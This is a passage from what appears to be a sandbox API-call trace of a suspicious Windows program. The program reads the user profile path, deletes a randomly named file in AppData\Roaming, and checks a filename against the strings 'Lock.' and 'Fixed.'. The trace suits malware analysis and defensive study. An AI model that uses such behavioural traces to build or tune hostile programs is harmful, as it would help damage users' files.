wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.726] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.726] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.726] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.726] FreeLibrary (hLibModule=0x74d40000) returned 1 [0206.727] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.727] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.727] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.729] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.729] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.729] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0206.730] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0206.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0206.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f78 [0206.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0206.730] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0206.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0206.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0206.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0206.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0206.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0206.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0206.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0206.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0206.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0206.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0206.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0206.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0206.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0206.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0206.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0206.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0206.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0206.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0206.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0206.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0206.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0206.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0206.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0206.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0206.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0206.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0206.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x88) returned 0x2420898 [0206.731] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/UEbu8HvUsrKZg-ZGj.m4a", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\UEbu8HvUsrKZg-ZGj.m4a", lpFilePart=0x8bedfc*="UEbu8HvUsrKZg-ZGj.m4a") returned 0x43 [0206.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0206.731] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\UEbu8HvUsrKZg-ZGj.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\uebu8hvusrkzg-zgj.m4a")) returned 0x2020 [0206.732] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\UEbu8HvUsrKZg-ZGj.m4a", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6d360f20, ftCreationTime.dwHighDateTime=0x1d4cffa, ftLastAccessTime.dwLowDateTime=0x3a8e6870, ftLastAccessTime.dwHighDateTime=0x1d4c766, ftLastWriteTime.dwLowDateTime=0x3a8e6870, ftLastWriteTime.dwHighDateTime=0x1d4c766, nFileSizeHigh=0x0, nFileSizeLow=0xf2fd, dwReserved0=0xe31, dwReserved1=0x4, cFileName="UEbu8HvUsrKZg-ZGj.m4a", cAlternateFileName="UEBU8H~1.M4A")) returned 0xaa5820 [0206.732] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\UEbu8HvUsrKZg-ZGj.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\uebu8hvusrkzg-zgj.m4a")) returned 1 [0206.733] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6d360f20, ftCreationTime.dwHighDateTime=0x1d4cffa, ftLastAccessTime.dwLowDateTime=0x3a8e6870, ftLastAccessTime.dwHighDateTime=0x1d4c766, ftLastWriteTime.dwLowDateTime=0x3a8e6870, ftLastWriteTime.dwHighDateTime=0x1d4c766, nFileSizeHigh=0x0, nFileSizeLow=0xf2fd, dwReserved0=0xe31, dwReserved1=0x4, cFileName="UEbu8HvUsrKZg-ZGj.m4a", cAlternateFileName="UEBU8H~1.M4A")) returned 0 [0206.733] FindClose (in: hFindFile=0xaa5820 | out: hFindFile=0xaa5820) returned 1 [0206.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0206.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0206.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0206.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0206.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0206.734] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0206.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0206.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0206.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0206.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0206.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0206.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0206.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0206.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0206.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0206.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0206.735] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0206.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0206.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0206.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f78 [0206.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0206.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0206.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa878 [0206.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0206.735] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0206.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0206.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0206.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0206.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0206.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0206.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0206.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0206.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0206.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0206.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0206.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0206.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0206.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0206.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0206.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0206.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0206.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0206.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0206.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0206.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0206.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0206.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0206.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0206.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0206.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0206.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0206.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0206.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0206.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0206.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0206.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0206.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0206.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0206.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0206.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0206.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0206.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0206.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x88) returned 0x2420898 [0206.737] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/UEbu8HvUsrKZg-ZGj.m4a", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\UEbu8HvUsrKZg-ZGj.m4a", lpFilePart=0x8bf658*="UEbu8HvUsrKZg-ZGj.m4a") returned 0x43 [0206.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0206.737] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\UEbu8HvUsrKZg-ZGj.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\uebu8hvusrkzg-zgj.m4a")) returned 0xffffffff [0206.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0206.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0206.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0206.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0206.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0206.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0206.738] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0206.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0206.738] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0206.738] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0206.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0206.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0206.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0206.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0206.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0206.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0206.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0206.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0206.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0206.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0206.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0206.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0206.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0206.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uKUOp3ady.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KUOp3ady.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UOp3ady.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Op3ady.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3ady.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3ady.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ady.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dy.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0206.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0206.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0206.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0206.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0206.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0206.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0206.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0206.739] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0206.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0206.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0206.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0206.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0206.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0206.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0206.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0206.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0206.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0206.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0206.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0206.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0206.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0206.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0206.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0206.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0206.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0206.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0206.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b6d28 [0206.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0206.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uKUOp3ady.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KUOp3ady.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UOp3ady.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Op3ady.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3ady.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3ady.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0206.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ady.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0206.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dy.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0206.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0206.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0206.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0206.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0206.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0206.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0206.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0206.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0206.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0206.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0206.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0206.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0206.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0206.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3688 | out: hHeap=0x25c0000) returned 1 [0206.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0206.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0206.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0206.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0206.741] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0206.741] RtlAllocateHeap (HeapHandle=0x25c0000, 